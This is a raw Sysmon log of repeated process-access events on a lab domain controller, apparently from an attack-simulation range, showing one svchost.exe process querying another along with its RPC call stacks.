13:29:59.389{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.389{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.389{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.389{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.389{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.389{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.389{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4754-6000-1A05-000000009A01}28843340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 